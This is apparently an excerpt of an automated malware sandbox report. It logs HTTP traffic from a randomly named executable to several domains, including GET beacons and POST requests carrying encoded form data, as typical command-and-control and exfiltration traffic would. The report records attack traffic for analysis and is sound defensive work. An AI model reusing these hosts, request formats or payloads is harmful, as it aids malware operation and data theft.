                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.11.2049793162.213.249.216803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:13.851924896 CEST548OUTGET /d84b/?Xb3xI=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dorikis.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:57:14.183286905 CEST610INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 25 Sep 2024 07:57:14 GMT
                                                                                  Server: Apache
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Content-Length: 389
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.11.20497943.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:19.641379118 CEST837OUTPOST /qo4k/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.platinumkitchens.info
                                                                                  Origin: http://www.platinumkitchens.info
                                                                                  Referer: http://www.platinumkitchens.info/qo4k/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 36 34 69 4e 7a 57 38 6a 59 62 4e 37 33 35 39 77 55 49 75 65 33 56 38 61 6e 32 37 2f 76 46 62 66 67 6a 77 56 68 57 62 7a 37 30 63 52 32 50 5a 63 42 4a 7a 75 68 59 46 68 68 77 61 6d 41 32 49 6f 68 47 6a 57 42 56 52 55 76 55 34 7a 6b 39 38 68 74 67 6f 67 44 55 72 46 65 44 45 42 30 68 50 66 6f 65 33 4c 39 71 59 61 2b 77 55 71 74 36 56 34 57 57 46 6e 6c 50 6f 5a 79 68 52 56 6b 35 4d 4f 51 42 6f 39 73 46 4f 37 76 70 70 2b 77 53 54 39 56 62 48 2f 45 51 41 32 59 6a 79 58 50 37 74 57 42 75 41 75 58 55 57 39 42 34 59 63 69 59 53 67 38 58 45 48 51 47 2b 46 54 2f 6c 69 4a 2f 30 57 76 51 3d 3d
                                                                                  Data Ascii: Xb3xI=64iNzW8jYbN7359wUIue3V8an27/vFbfgjwVhWbz70cR2PZcBJzuhYFhhwamA2IohGjWBVRUvU4zk98htgogDUrFeDEB0hPfoe3L9qYa+wUqt6V4WWFnlPoZyhRVk5MOQBo9sFO7vpp+wST9VbH/EQA2YjyXP7tWBuAuXUW9B4YciYSg8XEHQG+FT/liJ/0WvQ==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.11.20497953.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:22.298674107 CEST857OUTPOST /qo4k/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.platinumkitchens.info
                                                                                  Origin: http://www.platinumkitchens.info
                                                                                  Referer: http://www.platinumkitchens.info/qo4k/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 36 34 69 4e 7a 57 38 6a 59 62 4e 37 32 59 4e 77 58 76 36 65 31 31 38 46 70 57 37 2f 36 56 62 6c 67 6a 38 56 68 54 37 6a 36 47 6f 52 32 76 70 63 41 4d 50 75 73 34 46 68 6d 41 62 73 4e 57 49 5a 68 48 65 70 42 55 74 55 76 56 63 7a 6b 34 41 68 74 33 38 2f 4d 6b 72 48 48 7a 45 44 37 42 50 66 6f 65 33 4c 39 75 30 38 2b 77 4d 71 74 4b 6c 34 56 33 46 34 76 76 6f 61 31 68 52 56 7a 70 4d 4b 51 42 6f 6c 73 42 50 57 76 74 5a 2b 77 54 6a 39 56 75 7a 34 4e 51 41 4b 58 44 7a 7a 4d 49 4e 63 4b 4d 6f 50 53 57 47 52 4e 71 77 2b 6a 4f 44 36 68 6c 77 6a 54 56 69 33 58 50 63 4b 4c 39 31 4e 79 66 4e 53 6a 5a 35 2b 42 6f 63 35 5a 59 6c 69 37 53 6b 76 36 70 63 3d
                                                                                  Data Ascii: Xb3xI=64iNzW8jYbN72YNwXv6e118FpW7/6Vblgj8VhT7j6GoR2vpcAMPus4FhmAbsNWIZhHepBUtUvVczk4Aht38/MkrHHzED7BPfoe3L9u08+wMqtKl4V3F4vvoa1hRVzpMKQBolsBPWvtZ+wTj9Vuz4NQAKXDzzMINcKMoPSWGRNqw+jOD6hlwjTVi3XPcKL91NyfNSjZ5+Boc5ZYli7Skv6pc=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.11.20497963.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:24.939691067 CEST1289OUTPOST /qo4k/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.platinumkitchens.info
                                                                                  Origin: http://www.platinumkitchens.info
                                                                                  Referer: http://www.platinumkitchens.info/qo4k/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 36 34 69 4e 7a 57 38 6a 59 62 4e 37 32 59 4e 77 58 76 36 65 31 31 38 46 70 57 37 2f 36 56 62 6c 67 6a 38 56 68 54 37 6a 36 47 77 52 32 2b 4a 63 42 76 6e 75 74 34 46 68 70 51 62 74 4e 57 49 41 68 48 47 6c 42 55 68 45 76 58 55 7a 6c 61 34 68 36 57 38 2f 58 30 72 48 61 44 45 41 30 68 4f 48 6f 65 6e 48 39 71 55 38 2b 77 4d 71 74 4a 39 34 42 32 46 34 38 2f 6f 5a 79 68 52 6e 6b 35 4e 74 51 42 41 66 73 42 43 72 6f 63 6c 2b 31 41 62 39 47 6f 66 34 43 51 41 79 57 44 7a 72 4d 49 41 47 4b 4e 45 44 53 58 69 37 4e 74 55 2b 67 2f 79 79 34 57 38 6c 41 57 6d 6c 65 2b 6b 39 46 66 78 30 73 2f 46 54 76 4a 6c 43 4d 74 77 4a 53 70 56 50 69 69 78 76 6c 76 31 30 47 58 50 55 61 58 6f 50 77 48 6a 55 4a 50 35 32 71 65 59 5a 78 7a 55 45 30 50 2b 4f 59 59 69 61 63 49 67 72 57 6c 68 71 48 49 5a 77 52 55 79 4b 35 46 66 76 65 39 50 65 4d 48 51 51 67 79 44 4e 6c 44 46 4b 43 64 6c 6d 73 79 46 4b 6d 51 39 38 51 53 6d 64 63 67 43 63 6d 6a 32 6f 35 71 47 66 67 55 37 4b 47 78 6f 77 51 69 70 56 35 32 68 73 2f 36 58 41 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=64iNzW8jYbN72YNwXv6e118FpW7/6Vblgj8VhT7j6GwR2+JcBvnut4FhpQbtNWIAhHGlBUhEvXUzla4h6W8/X0rHaDEA0hOHoenH9qU8+wMqtJ94B2F48/oZyhRnk5NtQBAfsBCrocl+1Ab9Gof4CQAyWDzrMIAGKNEDSXi7NtU+g/yy4W8lAWmle+k9Ffx0s/FTvJlCMtwJSpVPiixvlv10GXPUaXoPwHjUJP52qeYZxzUE0P+OYYiacIgrWlhqHIZwRUyK5Ffve9PeMHQQgyDNlDFKCdlmsyFKmQ98QSmdcgCcmj2o5qGfgU7KGxowQipV52hs/6XAjVT4v3+VyjI1utNI3zk/NqLCwi4AJvDeWRwrzudDX2ijOtgLneMDwgsrS3dxCyEkr7se7jvIJWgErmR17ni2vXQnoRwoPObF6hLG9E4BXP3S+HVSud3ddmfJS8nEgjSO/+/qNowp8ENtoCLMdUSbwFAtOD/7hRTRjnVr4VlAFz6KDFe3G7B7Rh0OlbvM988GzJq0avhWgWeU6peEr+IK9pCnQCbz/Ses5Tj1y58jOubsqmZi22V2NJ8ZffQ0xeC+UIFOHd5tZ6kS8NeEEATVJZa9sb/aS9SiIQFG2WLZ8njkZbADaDvXU8VDOhV
                                                                                  Sep 25, 2024 09:57:24.939769983 CEST6717OUTData Raw: 41 73 57 63 45 45 51 58 44 4d 33 2b 67 52 5a 70 71 32 46 77 63 68 4a 53 4c 6f 48 64 5a 6e 33 43 35 62 56 4e 34 73 45 46 55 72 2b 35 43 33 6f 45 6a 48 68 59 72 63 4f 30 6b 4a 4d 58 2f 62 49 63 2b 44 6f 61 54 4d 39 4b 37 4b 2f 74 66 48 79 4b 4c 62
                                                                                  Data Ascii: AsWcEEQXDM3+gRZpq2FwchJSLoHdZn3C5bVN4sEFUr+5C3oEjHhYrcO0kJMX/bIc+DoaTM9K7K/tfHyKLbAfAsoduVF6BAfa46v5gdpwNBQa4blZey/CECRiBLc1/SZUKP3yjLlCI7chNc1K9ZUEKb/+Jc8MCu+gcLXU5qJFt8q0ErPXNjm38BQEzjQPcYboCBKKpM2xE7LhFx48kwO2EUmCLGS4J0/WeT2zhENUHLKUHBYEnqg


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.11.20497973.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:27.576461077 CEST555OUTGET /qo4k/?O4bP=9dRH6ZfHbJX&Xb3xI=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.platinumkitchens.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:57:27.682461977 CEST398INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:57:27 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 34 62 50 3d 39 64 52 48 36 5a 66 48 62 4a 58 26 58 62 33 78 49 3d 33 36 4b 74 77 6a 49 44 61 66 6f 6d 79 39 74 71 4f 64 71 4e 77 6d 73 54 6e 30 4b 53 38 79 44 71 77 42 6f 54 30 54 6e 68 6d 57 4e 42 6d 72 63 57 41 35 37 6a 35 38 31 72 33 79 36 6c 53 33 59 70 78 6c 37 62 58 48 64 6b 34 57 68 53 33 4b 73 4e 7a 48 5a 62 58 31 4c 31 55 78 6f 4b 39 7a 4c 35 6c 75 75 51 72 63 4a 4d 39 69 41 6f 72 34 68 41 4c 41 4a 74 6f 4b 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?O4bP=9dRH6ZfHbJX&Xb3xI=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM="}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.11.20497983.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:32.927434921 CEST804OUTPOST /yyvd/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dhkatp.vip
                                                                                  Origin: http://www.dhkatp.vip
                                                                                  Referer: http://www.dhkatp.vip/yyvd/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 41 6f 30 70 43 43 45 68 30 56 4f 33 48 79 55 37 66 42 2f 7a 69 47 4a 51 37 75 64 58 38 2b 6b 63 38 6e 4a 79 32 4c 62 37 33 33 74 6f 37 70 55 70 32 39 31 5a 6d 43 49 43 6c 36 75 45 4b 61 42 71 64 47 79 62 59 33 73 65 4a 67 79 66 57 48 70 6a 39 35 6c 58 4e 62 39 77 2b 66 6c 36 44 7a 4e 4b 66 38 6b 66 68 67 59 43 66 46 5a 61 47 79 31 68 61 53 41 33 6b 74 61 68 6f 2f 79 34 34 4b 43 59 6b 47 41 4a 31 53 30 63 73 38 48 6b 54 6c 4f 4c 58 71 53 44 33 2b 54 44 74 61 55 66 74 79 53 64 79 30 73 6b 2b 54 66 48 48 62 50 71 39 79 75 2f 4c 71 69 4d 59 7a 6c 57 61 68 31 34 6a 35 54 6a 34 77 3d 3d
                                                                                  Data Ascii: Xb3xI=Ao0pCCEh0VO3HyU7fB/ziGJQ7udX8+kc8nJy2Lb733to7pUp291ZmCICl6uEKaBqdGybY3seJgyfWHpj95lXNb9w+fl6DzNKf8kfhgYCfFZaGy1haSA3ktaho/y44KCYkGAJ1S0cs8HkTlOLXqSD3+TDtaUftySdy0sk+TfHHbPq9yu/LqiMYzlWah14j5Tj4w==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.11.20497993.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:35.562297106 CEST824OUTPOST /yyvd/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dhkatp.vip
                                                                                  Origin: http://www.dhkatp.vip
                                                                                  Referer: http://www.dhkatp.vip/yyvd/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 41 6f 30 70 43 43 45 68 30 56 4f 33 47 53 6b 37 50 53 6e 7a 6c 6d 4a 66 2b 75 64 58 33 65 6b 59 38 6e 46 79 32 50 4b 32 33 45 4a 6f 37 4a 6b 70 78 4d 31 5a 71 69 49 43 74 61 75 59 48 36 42 39 64 47 33 6b 59 79 4d 65 4a 6b 69 66 57 43 56 6a 39 76 74 55 4d 4c 39 75 31 2f 6c 43 65 44 4e 4b 66 38 6b 66 68 67 4d 6b 66 46 42 61 48 44 6c 68 62 32 30 30 6e 74 61 69 70 2f 79 34 70 61 44 77 6b 47 41 6e 31 54 6f 6d 73 36 44 6b 54 67 4b 4c 57 37 53 43 67 75 53 49 67 36 56 61 72 68 76 6a 70 42 78 53 34 55 76 4a 43 4a 36 57 78 45 2f 6c 57 59 57 6f 62 67 35 6b 65 52 4d 51 68 37 53 34 6c 7a 66 71 7a 48 36 49 45 75 57 4a 44 72 73 6c 71 74 58 66 6d 35 77 3d
                                                                                  Data Ascii: Xb3xI=Ao0pCCEh0VO3GSk7PSnzlmJf+udX3ekY8nFy2PK23EJo7JkpxM1ZqiICtauYH6B9dG3kYyMeJkifWCVj9vtUML9u1/lCeDNKf8kfhgMkfFBaHDlhb200ntaip/y4paDwkGAn1Toms6DkTgKLW7SCguSIg6VarhvjpBxS4UvJCJ6WxE/lWYWobg5keRMQh7S4lzfqzH6IEuWJDrslqtXfm5w=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.11.20498003.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:38.203566074 CEST2578OUTPOST /yyvd/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dhkatp.vip
                                                                                  Origin: http://www.dhkatp.vip
                                                                                  Referer: http://www.dhkatp.vip/yyvd/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 41 6f 30 70 43 43 45 68 30 56 4f 33 47 53 6b 37 50 53 6e 7a 6c 6d 4a 66 2b 75 64 58 33 65 6b 59 38 6e 46 79 32 50 4b 32 33 45 42 6f 36 36 73 70 32 66 4e 5a 72 69 49 43 6e 36 75 62 48 36 41 2f 64 48 54 67 59 79 49 4f 4a 69 2b 66 45 77 4e 6a 70 4b 4e 55 48 4c 39 75 6f 76 6c 35 44 7a 4e 54 66 38 30 62 68 67 63 6b 66 46 42 61 48 42 4e 68 59 69 41 30 68 74 61 68 6f 2f 7a 33 34 4b 44 4c 6b 47 49 52 31 54 64 62 74 4c 2f 6b 53 41 61 4c 61 70 36 43 2f 65 53 4b 6c 36 56 38 72 68 6a 47 70 41 59 74 34 55 79 55 43 4f 47 57 37 43 47 39 52 70 71 55 59 53 77 75 43 52 42 6f 74 36 71 6f 6e 52 2f 56 2b 57 79 66 4f 5a 47 64 4b 59 4d 6c 76 4f 33 30 37 39 49 77 38 61 42 4b 6f 75 51 2b 4e 78 53 53 76 37 6f 4e 47 74 64 59 62 34 43 46 79 38 47 63 55 66 2b 6c 67 64 5a 37 45 73 2f 51 66 43 6a 6e 46 7a 70 45 36 7a 6d 57 4a 43 7a 53 34 4c 41 6a 57 6b 56 4c 5a 68 73 2f 4e 30 63 36 76 46 53 39 73 5a 69 54 33 58 71 31 76 42 61 78 57 72 50 2b 5a 38 47 4d 34 75 78 63 4b 41 36 52 49 41 68 4c 6a 65 34 56 52 58 41 4f [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=Ao0pCCEh0VO3GSk7PSnzlmJf+udX3ekY8nFy2PK23EBo66sp2fNZriICn6ubH6A/dHTgYyIOJi+fEwNjpKNUHL9uovl5DzNTf80bhgckfFBaHBNhYiA0htaho/z34KDLkGIR1TdbtL/kSAaLap6C/eSKl6V8rhjGpAYt4UyUCOGW7CG9RpqUYSwuCRBot6qonR/V+WyfOZGdKYMlvO3079Iw8aBKouQ+NxSSv7oNGtdYb4CFy8GcUf+lgdZ7Es/QfCjnFzpE6zmWJCzS4LAjWkVLZhs/N0c6vFS9sZiT3Xq1vBaxWrP+Z8GM4uxcKA6RIAhLje4VRXAO4D9kWTPBR07/BVebi1iUUbnYh8xwYnBrAgc2WWHcfNcUA3X/wJZt2vcAAFHNEGef/k+kDnX9GT6lppqfiYfGdi70NcwXY8DedkAU+i5qUUrWAyaLIwJsjgakZijy71x8BsqiFCEhul3POr9OBDCbarvidvhVnWbTX0xadEuHa9wCPpbO5fJBliycvkz3BcZZtDVgyY2+5IqhzWlFQ7S8ShlNrotv7P3bazgn9Z2JEz4pZQ9JFau8Cozgm3kfqUSyQqYUJh8SjoZCUZbFUhx9cAilEm8QS9vmZAPEfVhJUay1nEDn2YgsTL4tz7I3rQb+ivbMyrs7IvrZ/Aa+CHfqxvlaBlJPEaRSz/TnEObVyVebZi4oYYKgOa8AcndQuA7l3c1la/J7pyTj7w+N1wfIIMKshjDmnbqwMnT1LH817smTLSKXnuiZUTbo8dh3dEnQxRXdTT9MNSasqSf9uBjDY0x6dkNM5ZwSnffUC0xt1MOCioOmP7AFpY3VviETWfoH2KhEQk+VQfQMWPVHEvsfdDixLl+vdfOdPX+AJlbRsAGQpe4r8uXbSMS1tG360nhxk0BT9MZ3mxWo+fULGqqMhsavQak6kYCjrSicDl8nIXy61lcN8BkkGITQ/6NcToGCkmdACwuarM+/8dIZmL5dCmTCVX5yDNfF2m [TRUNCATED]
                                                                                  Sep 25, 2024 09:57:38.203613043 CEST2578OUTData Raw: 75 4e 63 68 7a 45 46 44 50 70 66 31 51 61 64 37 74 4f 2b 43 52 76 76 56 30 66 2b 6c 33 36 4d 7a 58 48 73 32 34 51 72 35 64 43 76 47 2f 55 61 67 64 59 2f 74 32 75 66 48 54 70 71 51 47 75 30 6b 46 46 50 51 47 2b 34 43 79 54 6a 76 45 36 73 70 44 56
                                                                                  Data Ascii: uNchzEFDPpf1Qad7tO+CRvvV0f+l36MzXHs24Qr5dCvG/UagdY/t2ufHTpqQGu0kFFPQG+4CyTjvE6spDVPj34IE+ZeiG150aSfdu6us0VKF2TjCRUxOYO/vH9IwAA6+EyO6o2Yikwi5A1MQlaI+G6Rebh4kKSUhAS/4KMXORE5PtJ3OsH8/BU/kPSrKnfVXZQqyztRw6NR5sLEVJozs9U2VF5GugeI3mluwWMZigEUPr7Y0GJZ
